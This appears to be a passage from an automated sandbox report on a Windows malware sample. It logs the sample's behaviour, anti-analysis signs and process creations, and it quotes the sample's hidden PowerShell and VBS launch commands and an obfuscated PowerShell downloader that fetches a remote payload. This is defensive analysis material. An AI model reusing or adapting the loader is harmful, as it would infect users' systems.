          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6223
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3389
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6625
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3095
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7022
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2627
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5632Thread sleep time: -12912720851596678s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400Thread sleep count: 6625 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400Thread sleep count: 3095 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1224Thread sleep time: -8301034833169293s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
          Source: wscript.exe, 00000006.00000002.2318825850.000001D766D75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB930F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
          Source: powershell.exe, 00000000.00000002.2414714485.0000023977170000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3496836394.00000263D8C5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara matchFile source: amsi64_7164.amsi.csv, type: OTHER
          Source: Yara matchFile source: amsi64_2956.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2956, type: MEMORYSTR
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne';$Undsatdeoglyph = 1;Function Psykopaterne($Spleenens){$Diastem=$Spleenens.Length-$Undsatdeoglyph;$Noiler='SUBSTRIN';$Noiler+='G';For( $Undsat=5;$Undsat -lt $Diastem;$Undsat+=6){$Undramatisables+=$Spleenens.$Noiler.Invoke( $Undsat, $Undsatdeoglyph);}$Undramatisables;}function responsibly($Intraovarian129){ & ($Forgyldte) ($Intraovarian129);}$Skovtrernes=Psykopaterne 'nonamMHaydooDygtizCadeaiApplal Appel Mokkarepor/ Inds5Frak .Unde 0Talam W gsu(HappiWNonauiIrresnvivifd,ssocoTraktw,oressRabar SphecN fashTNonr, Kansa1Bes,t0Theop.Maint0Vap r; Bunt a.goWMaskei Pa.rnL.nia6S.ven4Syste;Petal VisoxAfg e6 Proc4Modst;Sanit Arm,nrOrdfovZ,nag: ista1Uvaer2Stopf1Sixti.Skrav0 Re.o)Photo Ga esGBagsteOvergc Cr.tkQuadroDoggi/thaum2 Vald0Amt,b1Physi0 Isse0N.gle1Phaet0Subco1Stigr SweeFSki.oiFin,erm duleK aphfGeneroClangx frem/Prale1Unsea2,ncul1 Caus.P.dio0S.asi ';$Hir=Psykopaterne 'PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent ';$Orloven=Psykopaterne 'DatabhUncoutNoncotfornupC,mpas Prad:Kodni/ .ypo/UnspiwAfmgtwArtifwPerfe. HolgeConfer,wirpph gga-Twi.erSkulaoStiftySpir,aProfilTvrli-Uni,pcTid.arPi gioReptiw PuttnAn id. 
DediiChadondeflofIndesoAcras/ PrdiwLenshhHotbr/CatapSStempa nagorGuleroVaabetChesthByggerLan,bu Vi,kmtrich.Adva,jLon.opvermibCamph> He.uhGarant ForbtBlamapItalisGypso: Must/Di ci/ Methw Undewforurw,ipse.Prom aPar.plSlmnimMobedr ConswVejgra,rogrd Togf.Barsecpara oStjdemCitat/Anywhw CholhSkaks/StyreS SwotaSheikrRutebo Sub.tVestshS,regr,emicuSepalmGela.. StikjNiddepSilicbLgnag ';$Syndsbekendelsens=Psykopaterne ' Insk>Strou ';$Forgyldte=Psykopaterne 'ShoppiMeasueEtta,xpoo.a ';$grydeskeers='Idrtsparkerne';$Advoker = Psykopaterne 'EftereGr,ndc StrihSa,lioDeta. Stad%RecidaGainspUlyksp Ud rd ilmna,glertForhaa M,no%Renai\.igenA.onathLandfoHash rSupponTrykitHailerL,cie.Slid.P Av.siTr,kabUnexo Bildk&Super&Sig l skyfoeSha.ec Rabah,ragioUnder OverftDisbr ';responsibly (Psykopaterne 'Farin$CyclogkontrlFr.byoCity,bRaakoaTematlNy.ed: A arBEpipto NitreLabourMilieeCla,s=Stran(,ragecOve hmI,terd,husc Va.df/Deminc.rape do b$OutbeA,udsedTu.thv.ttitoTalsykstab,e Outfrc alo)Res u ');responsibly (Psykopaterne 'Kalor$ E ebgAp.relKnn,soephyrbNa,uaaHonorlCompu: ,elgCF.rstrBayera Plumc,orthkConflaBrndsjStu saSvag,cIndl.kAbiga= Co e$.merkOBagvar ,rnelFolieoSyn ev,ngore Overn fluo. Col
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ahorntr.Pib && echo t"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
